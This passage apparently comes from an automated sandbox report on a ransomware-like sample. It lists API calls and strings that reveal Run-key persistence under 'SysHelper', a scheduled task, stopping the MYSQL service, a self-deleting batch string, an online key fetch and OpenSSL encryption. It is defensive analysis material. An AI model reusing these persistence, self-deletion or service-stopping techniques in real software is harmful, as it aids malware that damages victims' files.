                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: aed99fe01a9636375447950776c2bd949a2831d680206497a64bf89cf4b34b28
                                                                                                                                                                        • Instruction ID: d1890f6e6d96a82c25d288796f4dd1296d1f550c8549abc7b0bb2822a35e366c
                                                                                                                                                                        • Opcode Fuzzy Hash: aed99fe01a9636375447950776c2bd949a2831d680206497a64bf89cf4b34b28
                                                                                                                                                                        • Instruction Fuzzy Hash: 3BE086754000176AEE11CE29DD81BA5B3E2F7E1724F484DA4E44597009D33595199762
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00BA24FE
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA2509
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00BA251C
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00BA2539
                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00BA2550
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA255B
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00BA256E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                        • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                                                        • API String ID: 2372642624-488272950
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strncmp
                                                                                                                                                                        • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                                                                        • API String ID: 909875538-2733969777
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1503006713-0
                                                                                                                                                                        APIs
                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00BABB49
                                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00BABBBA
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BABBE4
                                                                                                                                                                        • GetComputerNameW.KERNEL32(00000000,?), ref: 00BABBF4
                                                                                                                                                                        • _free.LIBCMT ref: 00BABCD7
                                                                                                                                                                          • Part of subcall function 00BA1CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00C5AC68,000000FF), ref: 00BA1D12
                                                                                                                                                                          • Part of subcall function 00BA1CD0: _memset.LIBCMT ref: 00BA1D3B
                                                                                                                                                                          • Part of subcall function 00BA1CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00BA1D63
                                                                                                                                                                          • Part of subcall function 00BA1CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C5AC68,000000FF), ref: 00BA1D6C
                                                                                                                                                                          • Part of subcall function 00BA1CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00BA1DD6
                                                                                                                                                                          • Part of subcall function 00BA1CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00BA1E48
                                                                                                                                                                        • IsWindow.USER32(?), ref: 00BABF69
                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00BABF7B
                                                                                                                                                                        • DefWindowProcW.USER32(?,00008003,?,?), ref: 00BABFA8
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
• Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
• Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DecodePointer_write_multi_char_write_string$__aulldvrm__cftof_free_strlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • DecodePointer.KERNEL32 ref: 00BB7B29
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7B42
                                                                                                                                                                          • Part of subcall function 00BB0BED: HeapFree.KERNEL32(00000000,00000000,?,00BB507F,00000000,00BB520D,00BB0CE9), ref: 00BB0C01
                                                                                                                                                                          • Part of subcall function 00BB0BED: GetLastError.KERNEL32(00000000,?,00BB507F,00000000,00BB520D,00BB0CE9), ref: 00BB0C13
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7B55
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7B73
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7B85
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7B96
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7BA1
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7BC5
                                                                                                                                                                        • EncodePointer.KERNEL32(00DC2350), ref: 00BB7BCC
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7BE1
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7BF7
                                                                                                                                                                        • _free.LIBCMT ref: 00BB7C1F
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00BA1BB0
                                                                                                                                                                        • CoCreateInstance.OLE32(00C5E908,00000000,00000001,00C5D568,00000000), ref: 00BA1BC8
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00BA1BD0
                                                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00BA1C12
                                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00BA1C22
                                                                                                                                                                        • lstrcatW.KERNEL32(?,00C90050), ref: 00BA1C3A
                                                                                                                                                                        • lstrcatW.KERNEL32(?), ref: 00BA1C44
                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00BA1C68
                                                                                                                                                                        • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00BA1C7A
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                                                                                        • String ID: \shell32.dll
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000001,?,00BE4B72), ref: 00BE49C7
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00BE49D7
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BE49FB
                                                                                                                                                                        • GetProcessWindowStation.USER32(?,00BE4B72), ref: 00BE4A01
                                                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00BE4B72), ref: 00BE4A1C
                                                                                                                                                                        • GetLastError.KERNEL32(?,00BE4B72), ref: 00BE4A2A
                                                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00BE4B72), ref: 00BE4A65
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00BE4A8A
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                        • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,00BE4C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00BE480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00BE1D37,00000000,00B9CDAE,00000001,00000001), ref: 00BE4AFA
                                                                                                                                                                        • GetFileType.KERNEL32(00000000,?,00BE1D37,00000000,00B9CDAE,00000001,00000001), ref: 00BE4B05
                                                                                                                                                                        • __vfwprintf_p.LIBCMT ref: 00BE4B27
                                                                                                                                                                          • Part of subcall function 00BBBDCC: _vfprintf_helper.LIBCMT ref: 00BBBDDF
                                                                                                                                                                        • vswprintf.LIBCMT ref: 00BE4B5D
                                                                                                                                                                        • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00BE4B7E
                                                                                                                                                                        • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00BE4BA2
                                                                                                                                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00BE4BA9
                                                                                                                                                                        • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00BE4BD3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                                                                        • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00BA2389
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA23B6
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 00BA23DE
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00BA23E7
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00BA23F4
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00BA23FF
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BA240E
                                                                                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 00BA2422
                                                                                                                                                                        Strings
                                                                                                                                                                        • SysHelper, xrefs: 00BA23D6
                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00BA237F
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00B9DAEB
                                                                                                                                                                        • CoCreateInstance.OLE32(00C64F6C,00000000,00000001,00C64F3C,?,?,00C5A948,000000FF), ref: 00B9DB0B
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00B9DBD6
                                                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,00C5A948,000000FF), ref: 00B9DBE3
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9DC38
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00B9DC92
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                                                                        • String ID: --Task$Comment$Time Trigger Task
                                                                                                                                                                        • API String ID: 330603062-1376107329
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00BA1A1D
                                                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00BA1A32
                                                                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00BA1A46
                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00BA1A5B
                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 00BA1A75
                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00BA1A80
                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00BA1A9E
                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00BA1AA1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                                                                        • String ID: MYSQL
                                                                                                                                                                        • API String ID: 2359367111-1651825290
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00BDF27F
                                                                                                                                                                          • Part of subcall function 00BC0CFC: std::exception::_Copy_str.LIBCMT ref: 00BC0D15
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BDF294
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,?,00C9793C,?,?,?,?,?,00BB3B9C,?,00C9793C,?,00000001), ref: 00BC0F1F
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00BDF2AD
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BDF2C2
                                                                                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 00BDF2D4
                                                                                                                                                                          • Part of subcall function 00BDEF74: std::exception::exception.LIBCMT ref: 00BDEF8E
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BDF2E2
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00BDF2FB
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BDF310
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                                                                        • String ID: bad function call
                                                                                                                                                                        • API String ID: 2464034642-3612616537
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 00BF54C8
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00BF54D4
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 00BF54F7
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00BF5503
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00BF5531
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 00BF555B
                                                                                                                                                                        • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 00BF55F5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                        • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                                                                        • API String ID: 1717984340-2085858615
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BB0FDD: __wfsopen.LIBCMT ref: 00BB0FE8
                                                                                                                                                                        • _fgetws.LIBCMT ref: 00B9C7BC
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9C89F
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 00B9C94B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                                        • API String ID: 2864494435-54166481
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll), ref: 00B9F338
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00B9F353
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                                                                        • API String ID: 2574300362-2555811374
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                                        • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                                                                        • API String ID: 1783060780-3771355929
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strncmp
                                                                                                                                                                        • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                                                                        • API String ID: 909875538-2908105608
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 00B9C6C2
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 00B9C6F3
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B9C700
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 00B9C725
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B9C72E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseValue$OpenQuery
                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                                                                        • API String ID: 3962714758-1667468722
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAE707
                                                                                                                                                                          • Part of subcall function 00B9C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B9C51B
                                                                                                                                                                        • InternetOpenW.WININET ref: 00BAE743
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00BAE7AE
                                                                                                                                                                        • _memmove.LIBCMT ref: 00BAE838
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00BAE90A
                                                                                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00BAE93D
                                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00BAE954
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00BAE96F
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAE98C
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAE9A3
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00BAE9CD
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE9F3
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE9F6
                                                                                                                                                                        • _strstr.LIBCMT ref: 00BAEA36
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEA59
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEA74
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEA82
                                                                                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00BAEA92
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEAA4
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEABA
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEAC8
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00BAEAE3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEB5B
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEB7C
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BAEB86
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAEB94
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00BAEBAE
